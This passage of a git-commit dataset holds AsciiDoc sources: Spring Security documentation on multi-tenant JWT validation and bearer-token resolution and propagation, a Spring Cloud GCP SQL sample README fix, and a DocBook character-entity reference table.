IllegalArgumentException(e);\n\t\t}\n\t}\n}\n----\n<1> A hypothetical source for tenant information\n<2> A cache for `JWKKeySelector`s, keyed by tenant identifier\n<3> Looking up the tenant is more secure than simply calculating the JWK Set endpoint on the fly - the lookup acts as a tenant whitelist\n<4> Create a `JWSKeySelector` via the types of keys that come back from the JWK Set endpoint - the lazy lookup here means that you don't need to configure all tenants at startup\n\nThe above key selector is a composition of many key selectors.\nIt chooses which key selector to use based on the `iss` claim in the JWT.\n\nNOTE: To use this approach, make sure that the authorization server is configured to include the claim set as part of the token's signature.\nWithout this, you have no guarantee that the issuer hasn't been altered by a bad actor.\n\nNext, we can construct a `JWTProcessor`:\n\n[source,java]\n----\n@Bean\nJWTProcessor jwtProcessor(JWTClaimSetJWSKeySelector keySelector) {\n\tConfigurableJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor();\n\tjwtProcessor.setJWTClaimSetJWSKeySelector(keySelector);\n\treturn jwtProcessor;\n}\n----\n\nAs you are already seeing, the trade-off for moving tenant-awareness down to this level is more configuration.\nWe have just a bit more.\n\nNext, we still want to make sure you are validating the issuer.\nBut, since the issuer may be different per JWT, then you'll need a tenant-aware validator, too:\n\n[source,java]\n----\n@Component\npublic class TenantJwtIssuerValidator implements OAuth2TokenValidator<Jwt> {\n\tprivate final TenantRepository tenants;\n\tprivate final Map<String, JwtIssuerValidator> validators = new ConcurrentHashMap<>();\n\n\tpublic TenantJwtIssuerValidator(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic OAuth2TokenValidatorResult validate(Jwt token) {\n\t\treturn this.validators.computeIfAbsent(toTenant(token), this::fromTenant)\n\t\t\t\t.validate(token);\n\t}\n\n\tprivate String toTenant(Jwt jwt) {\n\t\treturn jwt.getIssuer();\n\t}\n\n\tprivate JwtIssuerValidator fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenants.findById(tenant))\n\t\t .map(t -> t.getAttribute(\"issuer\"))\n\t\t\t\t.map(JwtIssuerValidator::new)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n}\n----\n\nNow that we have a tenant-aware processor and a tenant-aware validator, we can proceed with creating our `JwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder(JWTProcessor jwtProcessor, OAuth2TokenValidator<Jwt> jwtValidator) {\n\tNimbusJwtDecoder decoder = new NimbusJwtDecoder(processor);\n\tOAuth2TokenValidator<Jwt> validator = new DelegatingOAuth2TokenValidator<>\n\t\t\t(JwtValidators.createDefault(), this.jwtValidator);\n\tdecoder.setJwtValidator(validator);\n\treturn decoder;\n}\n----\n\nWe've finished talking about resolving the tenant.\n\nIf you've chosen to resolve the tenant by something other than a JWT claim, then you'll need to make sure you address your downstream resource servers in the same way.\nFor example, if you are resolving it by subdomain, you may need to address the downstream resource server using the same subdomain.\n\nHowever, if you resolve it by a claim in the bearer token, read on to learn about <<oauth2resourceserver-bearertoken-resolver,Spring Security's support for bearer token propagation>>.\n\n[[oauth2resourceserver-bearertoken-resolver]]\n=== Bearer Token Resolution\n\nBy default, Resource Server looks for a bearer token in the `Authorization` header.\nThis, however, can be customized in a couple of ways.\n\n==== Reading the Bearer Token from a Custom Header\n\nFor example, you may have a need to read the bearer token from a custom header.\nTo achieve this, you can wire a `HeaderBearerTokenResolver` instance into the DSL, as you can see in the following example:\n\n.Custom Bearer Token Header\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(new HeaderBearerTokenResolver(\"x-goog-iap-jwt-assertion\"))\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <constructor-arg value=\"x-goog-iap-jwt-assertion\"\/>\n<\/bean>\n----\n====\n\n==== Reading the Bearer Token from a Form Parameter\n\nOr, you may wish to read the token from a form parameter, which you can do by configuring the `DefaultBearerTokenResolver`, as you can see below:\n\n.Form Parameter Bearer Token\n====\n.Java\n[source,java,role=\"primary\"]\n----\nDefaultBearerTokenResolver resolver = new DefaultBearerTokenResolver();\nresolver.setAllowFormEncodedBodyParameter(true);\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(resolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <property name=\"allowFormEncodedBodyParameter\" value=\"true\"\/>\n<\/bean>\n----\n====\n\n=== Bearer Token Propagation\n\nNow that you're in possession of a bearer token, it might be handy to pass that to downstream services.\nThis is quite simple with `{security-api-url}org\/springframework\/security\/oauth2\/server\/resource\/web\/reactive\/function\/client\/ServletBearerExchangeFilterFunction.html[ServletBearerExchangeFilterFunction]`, which you can see in the following example:\n\n[source,java]\n----\n@Bean\npublic WebClient rest() {\n return WebClient.builder()\n .filter(new ServletBearerExchangeFilterFunction())\n .build();\n}\n----\n\nWhen the above `WebClient` is used to perform requests, Spring Security will look up the current `Authentication` and extract any `{security-api-url}org\/springframework\/security\/oauth2\/core\/AbstractOAuth2Token.html[AbstractOAuth2Token]` credential.\nThen, it will propagate that token in the `Authorization` header.\n\nFor example:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .retrieve()\n .bodyToMono(String.class)\n .block()\n----\n\nWill invoke the `https:\/\/other-service.example.com\/endpoint`, adding the bearer token `Authorization` header for you.\n\nIn places where you need to override this behavior, it's a simple matter of supplying the header yourself, like so:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .headers(headers -> headers.setBearerAuth(overridingToken))\n .retrieve()\n .bodyToMono(String.class)\n .block()\n----\n\nIn this case, the filter will fall back and simply forward the request onto the rest of the web filter chain.\n\n[NOTE]\nUnlike the https:\/\/docs.spring.io\/spring-security\/site\/docs\/current-SNAPSHOT\/api\/org\/springframework\/security\/oauth2\/client\/web\/reactive\/function\/client\/ServletOAuth2AuthorizedClientExchangeFilterFunction.html[OAuth 2.0 Client filter function], this filter function makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please use the OAuth 2.0 Client filter.\n\n==== `RestTemplate` support\n\nThere is no dedicated support for `RestTemplate` at the moment, but you can achieve propagation quite simply with your own interceptor:\n\n[source,java]\n----\n@Bean\nRestTemplate rest() {\n\tRestTemplate rest = new RestTemplate();\n\trest.getInterceptors().add((request, body, execution) -> {\n\t\tAuthentication authentication = SecurityContextHolder.getContext().getAuthentication();\n\t\tif (authentication == null) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tif (!(authentication.getCredentials() instanceof AbstractOAuth2Token)) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tAbstractOAuth2Token token = (AbstractOAuth2Token) authentication.getCredentials();\n\t request.getHeaders().setBearerAuth(token.getTokenValue());\n\t return execution.execute(request, body);\n\t});\n\treturn rest;\n}\n----\n\n[[oauth2resourceserver-bearertoken-failure]]\n=== Bearer Token Failure\n\nA bearer token may be invalid for a number of reasons. For example, the token may no longer be active.\n\nIn these circumstances, Resource Server throws an `InvalidBearerTokenException`.\nLike other exceptions, this results in an OAuth 2.0 Bearer Token error response:\n\n[source,http request]\n----\nHTTP\/1.1 401 Unauthorized\nWWW-Authenticate: Bearer error_code=\"invalid_token\", error_description=\"Unsupported algorithm of none\", error_uri=\"https:\/\/tools.ietf.org\/html\/rfc6750#section-3.1\"\n----\n\nAdditionally, it is published as an `AuthenticationFailureBadCredentialsEvent`, which you can <<servlet-events,listen for in your application>> like so:\n\n[source,java]\n----\n@Component\npublic class FailureEvents {\n\t@EventListener\n public void onFailure(AuthenticationFailureEvent failure) {\n\t\tif (badCredentials.getAuthentication() instanceof BearerTokenAuthenticationToken) {\n\t\t \/\/ ... handle\n }\n }\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9debe0aff000396f67045c17e3b70fc056ebcd3c","subject":"Fixes SQL password problem on sample README (#208)","message":"Fixes SQL password problem on sample README (#208)\n\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-examples\/spring-cloud-gcp-sql-example\/README.adoc","new_file":"spring-cloud-gcp-examples\/spring-cloud-gcp-sql-example\/README.adoc","new_contents":"= Spring Cloud GCP SQL Starter Example\n\nThis code sample demonstrates how to connect to a Google Cloud SQL instance using the\nlink:..\/..\/spring-cloud-gcp-starters\/spring-cloud-gcp-starter-sql\/README.adoc[Spring Cloud GCP SQL\nStarter].\n\nWe will create an instance, a database within the instance, populate the database and then query it.\n\n= Setup & Configuration\n\n1. Follow https:\/\/cloud.google.com\/sql\/docs\/mysql\/quickstart[these instructions] to set up a Google\nCloud Project with billing enabled and a Google Cloud SQL instance.\n\n2. Still within the Google Cloud Console, create a new database in the instance from the\n\"Databases\" section.\n\n3. Open the link:src\/main\/resources\/application.properties[application.properties] file and replace\n*[database-name]* with the name of the database you created in step 2 and *[instance-connection-name]*\nwith the instance connection name of the instance you created in step 1.\n+\nIf you set a root password, you should also add a `spring.datasource.password` property with the\npassword as the value.\n\n4. https:\/\/cloud.google.com\/sdk\/gcloud\/reference\/auth\/login[Authenticate in the Cloud SDK] or add\na `spring.cloud.gcp.sql.credentials.location` property with the path on your local file system to\na credentials file, prepended with `file:`.\n\n5. Run the `SqlApplication` Spring Boot app. The database will be populated based on the\nlink:src\/main\/resources\/schema.sql[schema.sql] and link:src\/main\/resources\/data.sql[data.sql] files.\n\n6. Navigate to http:\/\/localhost:8080\/getTuples in your browser to print the contents of the table\ncreated in 5.\n","old_contents":"= Spring Cloud GCP SQL Starter Example\n\nThis code sample demonstrates how to connect to a Google Cloud SQL instance using the\nlink:..\/..\/spring-cloud-gcp-starters\/spring-cloud-gcp-starter-sql\/README.adoc[Spring Cloud GCP SQL\nStarter].\n\nWe will create an instance, a database within the instance, populate the database and then query it.\n\n= Setup & Configuration\n\n1. Follow https:\/\/cloud.google.com\/sql\/docs\/mysql\/quickstart[these instructions] to set up a Google\nCloud Project with billing enabled and a Google Cloud SQL instance.\n\n2. Still within the Google Cloud Console, create a new database in the instance from the\n\"Databases\" section.\n\n3. Open the link:src\/main\/resources\/application.properties[application.properties] file and replace\n*[database-name]* with the name of the database you created in step 2 and *[instance-connection-name]*\nwith the instance connection name of the instance you created in step 1.\n+\nIf you set a root password, you should also add a `spring.cloud.gcp.sql.password` property with the\npassword as the value.\n\n4. https:\/\/cloud.google.com\/sdk\/gcloud\/reference\/auth\/login[Authenticate in the Cloud SDK] or add\na `spring.cloud.gcp.sql.credentials.location` property with the path on your local file system to\na credentials file, prepended with `file:`.\n\n5. Run the `SqlApplication` Spring Boot app. The database will be populated based on the\nlink:src\/main\/resources\/schema.sql[schema.sql] and link:src\/main\/resources\/data.sql[data.sql] files.\n\n6. Navigate to http:\/\/localhost:8080\/getTuples in your browser to print the contents of the table\ncreated in 5.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9519fad8e9c464460d7545996d837aef92854011","subject":"fixed links","message":"fixed links\n\nSigned-off-by: Jeen Broekstra <fbd8ee26f490c4e573d23434640d81bb5e018a41@gmail.com>\n","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"doc\/getting-started\/index.adoc","new_file":"doc\/getting-started\/index.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"760927fa9352fa7a2e50c4c3afffc37616a74d92","subject":"more symbols","message":"more symbols","repos":"ufpb-computacao\/asciidoc-book-template-with-rake-and-github,ufpb-computacao\/asciidoc-book-template-with-rake-and-github","old_file":"livro\/capitulos\/symbols.adoc","new_file":"livro\/capitulos\/symbols.adoc","new_contents":"== DocBook Character Entity Reference\n\nThese symbols where extrated from http:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/refchar.html.\n\nThis document was made to show how to write symbols with asciidoc.\nIt was also made to compile with dblatex. For example, since the \n`ℜ` doesn't compile with dblatex it will be here \nlike this: `& real;`. But if you are going to use in html or fop, you\ncan use `ℜ`.\n\nYou can see the code for \nhttps:\/\/raw.githubusercontent.com\/edusantana\/novo-livro\/master\/livro\/capitulos\/symbols.adoc[this document here].\n\n=== Added Math Symbols: Arrow Relations Character Entities (%isoamsa;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsb.html[Added Math Symbols: Arrow Relations Character Entities]\n\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| & amalg; | | amalgamation or coproduct\n| & Barwed; | ⊼ | Nand\n| ⌅ | ⊼ | Nand\n| ⋒ | ⋒ | Double intersection\n| ⋓ | ⋓ | Double union\n| ⋎ | ⋎ | Curly logical or\n| ⋏ | ⋏ | Curly logical and\n| ⋄ | ⋄ | Diamond operator\n| ⋇ | ⋇ | Division times\n| ⊺ | ⊺ | Intercalate\n| ⋋ | ⋋ | Left semidirect product\n| ⋉ | ⋉ | Left normal factor semidirect product\n| ⊟ | ⊟ | Squared minus\n| ⊛ | ⊛ | Circled asterisk operator\n| ⊚ | ⊚ | Circled ring operator\n| ⊝ | ⊝ | Circled dash\n| ⊙ | ⊙ | Circled dot operator\n| ⊖ | ⊖ | Circled minus\n| ⊕ | ⊕ | Circled plus\n| ⊘ | ⊘ | Circled division slash\n\n| ⊗ | ⊗ | Circled times\n| ⊞ | ⊞ | Squared plus\n| ∔ | ∔ | Dot plus\n| ⋌ | ⋌ | Right semidirect product\n| ⋊ | ⋊ | Right normal factor semidirect product\n| ⋅ | ⋅ | Dot operator\n| ⊡ | ⊡ | Squared dot operator\n| ∖ | ∖ | Set minus\n| ⊓ | ⊓ | Square cap\n| ⊔ | ⊔ | Square cup\n\n| & ssetmn; | | sm reverse solidus\n| ⋆ | ⋆ | Star operator\n| ⊠ | ⊠ | Squared times\n| ⊤ | ⊤ | Down tack\n| ⊎ | ⊎ | Multiset union\n| ≀ | ≀ | Wreath product\n| ◯ | ◯ | Large circle\n| ▽ | ▽ | White down-pointing triangle\n| △ | △ | White up-pointing triangle\n| ∐ | ∐ | N-ary coproduct\n\n| ∏ | ∏ | N-ary product\n| ∑ | ∑ | N-ary summation\n\n|====\n\n\n=== Added Math Symbols: Binary Operators Character Entities (%isoamsb;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsa.html[Added Math Symbols: Binary Operators Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n\n| ↶ | ↶ | Anticlockwise top semicircle arrow\n| ↷ | ↷ | Clockwise top semicircle arrow\n| ⇓ | ⇓ | Downwards double arrow\n| &darr2; | ⇊ | Downwards paired arrows\n| ⇃ | ⇃ | Downwards harpoon with barb leftwards\n| ⇂ | ⇂ | Downwards harpoon with barb rightwards\n| ⇚ | ⇚ | Leftwards triple arrow\n| ↞ | ↞ | Leftwards two headed arrow\n| &larr2; | ⇇ | Leftwards paired arrows\n| ↩ | ↩ | Leftwards arrow with hook\n| ↫ | ↫ | Leftwards arrow with loop\n| ↢ | ↢ | Leftwards arrow with tail\n| ↽ | ↽ | Leftwards harpoon with barb downwards\n| ↼ | ↼ | Leftwards harpoon with barb upwards\n| ⇔ | ⇔ | Left right double arrow\n| ↔ | ↔ | Left right arrow\n| &lrarr2; | ⇆ | Leftwards arrow over rightwards arrow\n| &rlarr2; | ⇄ | Rightwards arrow over leftwards arrow\n| ↭ | ↭ | Left right wave arrow\n| &rlhar2; | ⇌ | Rightwards harpoon over leftwards harpoon\n| &lrhar2; | ⇋ | Leftwards harpoon over rightwards harpoon\n| ↰ | ↰ | Upwards arrow with tip leftwards\n| ↦ | ↦ | Rightwards arrow from bar\n| ⊸ | ⊸ | Multimap\n| ↗ | ↗ | North east arrow\n| ⇍ | ⇍ | Leftwards double arrow with stroke\n| ↚ | ↚ | Leftwards arrow with stroke\n| ⇎ | ⇎ | Left right double arrow with stroke\n| ↮ | ↮ | Left right arrow with stroke\n| ↛ | ↛ | Rightwards arrow with stroke\n| ⇏ | ⇏ | Rightwards double arrow with stroke\n| ↖ | ↖ | North west arrow\n| ↺ | ↺ | Anticlockwise open circle arrow\n| ↻ | ↻ | Clockwise open circle arrow\n| ⇛ | ⇛ | Rightwards triple arrow\n| ↠ | ↠ | Rightwards two headed arrow\n| &rarr2; | ⇉ | Rightwards paired arrows\n| ↪ | ↪ | Rightwards arrow with hook\n| ↬ | ↬ | Rightwards arrow with loop\n| ↣ | ↣ | Rightwards arrow with tail\n| & rarrw; | ⇝ | Rightwards squiggle arrow\n| ⇁ | ⇁ | Rightwards harpoon with barb downwards\n| ⇀ | ⇀ | Rightwards harpoon with barb upwards\n| ↱ | ↱ | Upwards arrow with tip rightwards\n| &drarr; | ↘ | South east arrow\n| &dlarr; | ↙ | South west arrow\n| ⇑ | ⇑ | Upwards double arrow\n| &uarr2; | ⇈ | Upwards paired arrows\n| ⇕ | ⇕ | Up down double arrow\n| ↕ | ↕ | Up down arrow\n| ↿ | ↿ | Upwards harpoon with barb leftwards\n| ↾ | ↾ | Upwards harpoon with barb rightwards\n| & xlArr; | | long l dbl arrow \n| & xhArr; | | long l&r dbl arr\n| & xharr; | | long l&r arr \n| & xrArr; | | long rt dbl arr \n\n\n|====\n\n=== Added Math Symbols: Delimiters Character Entities (%isoamsc;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsc.html[Added Math Symbols: Delimiters Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⌉ | ⌉ | Right ceiling\n| ⌋ | ⌋ | Right floor\n| & rpargt; | | right paren, gt\n| ⌝ | ⌝ | Top right corner\n| ⌟ | ⌟ | Bottom right corner\n| ⌈ | ⌈ | Left ceiling\n| ⌊ | ⌊ | Left floor\n| & lpargt; | | left parenthesis, gt\n| ⌜ | ⌜ | Top left corner\n| ⌞ | ⌞ | Bottom left corner\n|====\n\n=== Added Math Symbols: Negated Relations Character Entities (%isoamsn;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsn.html[Added Math Symbols: Negated Relations Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⪊ | | greater, not approximate\n| ⪈ | ≩ | Greater-than but not equal to\n| ≩ | ≩ | Greater-than but not equal to\n| ⋧ | ⋧ | Greater-than but not equivalent to\n| ≩︀ | | gt, vert, not dbl eq\n| ⪉ | | less, not approximate\n| ≨ | ≨ | Less-than but not equal to\n| ⪇ | ≨ | Less-than but not equal to\n| ⋦ | ⋦ | Less-than but not equivalent to\n| ≨︀ | | less, vert, not dbl eq\n| ≉ | ≉ | Not almost equal to\n| ≇ | ≇ | Neither approximately nor actually equal to\n| ≢ | ≢ | Not identical to\n| ≧̸ | ≱ | Neither greater-than nor equal to\n| ≱ | | not greater-than-or-equal\n| ⩾̸ | ≱ | Neither greater-than nor equal to\n| ≯ | ≯ | Not greater-than\n| ≰ | | not less-than-or-equal\n| ≦̸ | ≰ | Neither less-than nor equal to\n| ⩽̸ | ≰ | Neither less-than nor equal to\n| ≮ | ≮ | Not less-than\n| ⋪ | ⋪ | Not normal subgroup of\n| ⋬ | ⋬ | Not normal subgroup of or equal to\n| ∤ | ∤ | Does not divide\n| ∦ | ∦ | Not parallel to\n| ⊀ | ⊀ | Does not precede\n| ⪯̸ | | not precedes, equals\n| ⋫ | ⋫ | Does not contain as normal subgroup of\n| ⋭ | ⋭ | Does not contain as normal subgroup or equal\n| ⊁ | ⊁ | Does not succeed\n| ⪰̸ | | not succeeds, equals\n| ≁ | ≁ | Not tilde\n| ≄ | ≄ | Not asymptotically equal to\n| ∤ | | nshortmid\n| ∦ | | not short par\n| ⊄ | ⊄ | Not a subset of\n| ⊈ | ⊈ | Neither a subset of nor equal to\n| ⫅̸ | ⊈ | Neither a subset of nor equal to\n| ⊅ | ⊅ | Not a superset of\n| ⫆̸ | ⊉ | Neither a superset of nor equal to\n| ⊉ | ⊉ | Neither a superset of nor equal to\n| ⊬ | ⊬ | Does not prove\n| ⊭ | ⊭ | Not true\n| ⊯ | ⊯ | Negated double vertical bar double right turnstile\n| ⊮ | ⊮ | Does not force\n| & prnap; | & #x22E8; | Precedes but not equivalent to\n| ⪵ | | precedes, not dbl eq\n| & prnsim; | & #x22E8; | Precedes but not equivalent to\n| ⪺ | ⋩ | Succeed but not equivalent to\n| ⪶ | | succeeds, not dbl eq\n| ⋩ | ⋩ | Succeed but not equivalent to\n| ⊊ | ⊊ | Subset of or not equal to\n| ⫋ | ⊊ | Subset of or not equal to\n| ⊋ | ⊋ | Superset of or not equal to\n| ⫌ | ⊋ | Superset of or not equal to\n| ⫋︀ | | subset not dbl eq, var\n| ⊊︀ | | subset, not eq, var\n| ⊋︀ | | superset, not eq, var\n| ⫌︀ | | super not dbl eq, var\n\n|====\n\n=== Added Math Symbols: Ordinary Character Entities (%isoamso;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amso.html[Added Math Symbols: Ordinary Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ∠ | ∠ | Angle\n| ∡ | ∡ | Measured angle\n| ℶ | ℶ | Bet symbol\n| ‵ | ‵ | Reversed prime\n| ∁ | ∁ | Complement\n| ℸ | ℸ | Dalet symbol\n| ℓ | ℓ | Script small l\n| ∅ | | emptyset \/varnothing =small o, slash\n| ℷ | ℷ | Gimel symbol\n| ℑ | ℑ | Fraktur letter capital i\n| ı | ı | Latin small letter dotless i\n| & jnodot; | | jmath - small j, no dot\n| ∄ | ∄ | There does not exist\n| Ⓢ | Ⓢ | Circled latin capital letter S\n| ℏ | ħ | Latin small letter h with stroke\n| ℜ | ℜ | Fraktur letter capital r\n| &sbsol; | | sbs - short reverse solidus\n| &vprime; | ′ | Prime\n| ℘ | ℘ | Script capital p\n\n|====\n\n=== Added Math Symbols: Relations Character Entities (%isoamsr;)\nAdded Math Symbols: Relations Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ≊ | ≊ | Almost equal or equal to\n| ≈ | ≍ | Equivalent to\n| & bcong; | & #x224C; | All equal to\n| ϶ | | such that\n| ⋈ | ⋈ | Bowtie\n| ∽ | ∽ | Reversed tilde\n| ⋍ | ⋍ | Reversed tilde equals\n| ≎ | ≎ | Geometrically equivalent to\n| ≏ | ≏ | Difference between\n| ≗ | ≗ | Ring equal to\n| ≔ | ≔ | Colon equals\n| ⋞ | ⋞ | Equal to or precedes\n| ⋟ | ⋟ | Equal to or succeeds\n| &cupre; | ≼ | Precedes or equal to\n| ⊣ | ⊣ | Left tack\n| ≖ | ≖ | Ring in equal to\n| ≕ | ≕ | Equals colon\n| ≑ | ≑ | Geometrically equal to\n| ≐ | ≐ | Approaches the limit\n| ≒ | ≒ | Approximately equal to or the image of\n| ⪖ | ⋝ | Equal to or greater-than\n| ⪕ | ⋜ | Equal to or less-than\n| ≓ | ≓ | Image of or approximately equal to\n| ⋔ | ⋔ | Pitchfork\n| ⌢ | ⌢ | Frown\n| & gap; | & #x2273; | Greater-than or equivalent to\n| &gsdot; | ⋗ | Greater-than with dot\n| ≧ | ≧ | Greater-than over equal to\n| ⋛ | ⋛ | Greater-than equal to or less-than\n| ⪌ | ⋛ | Greater-than equal to or less-than\n| ⩾ | | gt-or-equal, slanted\n| & Gg; | & #x22D9; | Very much greater-than\n| ≷ | ≷ | Greater-than or less-than\n| & gsim; | & #x2273; | Greater-than or equivalent to\n| ≫ | ≫ | Much greater-than\n| & lap; | & #x2272; | Less-than or equivalent to\n| &ldot; | ⋖ | Less-than with dot\n| ≦ | ≦ | Less-than over equal to\n| ⪋ | ⋚ | Less-than equal to or greater-than\n| ⋚ | ⋚ | Less-than equal to or greater-than\n| ⩽ | | less-than-or-eq, slant\n| ≶ | ≶ | Less-than or greater-than\n| & Ll; | & #x22D8; | Very much less-than\n| & lsim; | & #x2272; | Less-than or equivalent to\n| & Lt; | & #x226A; | Much less-than\n| ⊴ | ⊴ | Normal subgroup of or equal to\n| ∣ | ∣ | Divides\n| & models; | & #x22A7; | Models\n| ≺ | ≺ | Precedes\n| ⪷ | ≾ | Precedes or equivalent to\n| ⪯ | | precedes, equals\n| ≾ | ≾ | Precedes or equivalent to\n| ⊵ | ⊵ | Contains as normal subgroup or equal to\n| &samalg; | ∐ | N-ary coproduct\n| ≻ | ≻ | Succeeds\n| ⪸ | ≿ | Succeeds or equivalent to\n| ≽ | ≽ | Succeeds or equal to\n| ⪰ | ≽ | Succeeds or equal to\n| ≿ | ≿ | Succeeds or equivalent to\n| ⌢ | | small down curve\n| ∣ | | \u00a0\n| ⌣ | ⌣ | Smile\n| ∥ | | short parallel\n| ⊏ | ⊏ | Square image of\n| ⊑ | ⊑ | Square image of or equal to\n| ⊐ | ⊐ | Square original of\n| ⊒ | ⊒ | Square original of or equal to\n| ⌣ | | small up curve\n| ⋐ | ⋐ | Double subset\n| ⫅ | ⊆ | Subset of or equal to\n| ⋑ | ⋑ | Double superset\n| ⫆ | ⊇ | Superset of or equal to\n| ≈ | | thick approximate\n| ∼ | | thick similar\n| ≜ | ≜ | Delta equal to\n| ≬ | ≬ | Between\n| ⊢ | ⊢ | Right tack\n| ⊩ | ⊩ | Forces\n| & vDash; | & #x22A8; | True\n| ⊻ | ⊻ | Xor\n| ⊲ | ⊲ | Normal subgroup of\n| ∝ | ∝ | Proportional to\n| ⊳ | ⊳ | Contains as normal subgroup\n| ⊪ | ⊪ | Triple vertical bar right turnstile\n\n|====\n\n\n=== Box and Line Drawing Character Entities (%isobox;)\nBox and Line Drawing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ─ | ─ | Box drawings light horizontal\n| │ | │ | Box drawings light vertical\n| └ | └ | Box drawings light up and right\n| ┘ | ┘ | Box drawings light up and left\n| ┐ | ┐ | Box drawings light down and left\n| ┌ | ┌ | Box drawings light down and right\n| ├ | ├ | Box drawings light vertical and right\n| ┴ | ┴ | Box drawings light up and horizontal\n| ┤ | ┤ | Box drawings light vertical and left\n| ┬ | ┬ | Box drawings light down and horizontal\n| ┼ | ┼ | Box drawings light vertical and horizontal\n| ╞ | ╞ | Box drawings vertical single and right double\n| ╨ | ╨ | Box drawings up double and horizontal single\n| ╡ | ╡ | Box drawings vertical single and left double\n| ╥ | ╥ | Box drawings down double and horizontal single\n| ╪ | ╪ | Box drawings vertical single and horizontal double\n| ═ | ═ | Box drawings double horizontal\n| ║ | ║ | Box drawings double vertical\n| ╚ | ╚ | Box drawings double up and right\n| ╝ | ╝ | Box drawings double up and left\n| ╗ | ╗ | Box drawings double down and left\n| ╔ | ╔ | Box drawings double down and right\n| ╠ | ╠ | Box drawings double vertical and right\n| ╩ | ╩ | Box drawings double up and horizontal\n| ╣ | ╣ | Box drawings double vertical and left\n| ╦ | ╦ | Box drawings double down and horizontal\n| ╬ | ╬ | Box drawings double vertical and horizontal\n| ╟ | ╟ | Box drawings vertical double and right single\n| ╧ | ╧ | Box drawings up single and horizontal double\n| ╢ | ╢ | Box drawings vertical double and left single\n| ╤ | ╤ | Box drawings down single and horizontal double\n| ╫ | ╫ | Box drawings vertical double and horizontal single\n| ╘ | ╘ | Box drawings up single and right double\n| ╜ | ╜ | Box drawings up double and left single\n| ╕ | ╕ | Box drawings down single and left double\n| ╓ | ╓ | Box drawings down double and right single\n| ╙ | ╙ | Box drawings up double and right single\n| ╛ | ╛ | Box drawings up single and left double\n| ╖ | ╖ | Box drawings down double and left single\n| ╒ | ╒ | Box drawings down single and right double\n\n|====\n\n\n=== Russian Cyrillic Character Entities (%isocyr1;)\nRussian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Non-Russian Cyrillic Character Entities (%isocyr2;)\nNon-Russian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Diacritical Marks Character Entities (%isodia;)\nDiacritical Marks Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | 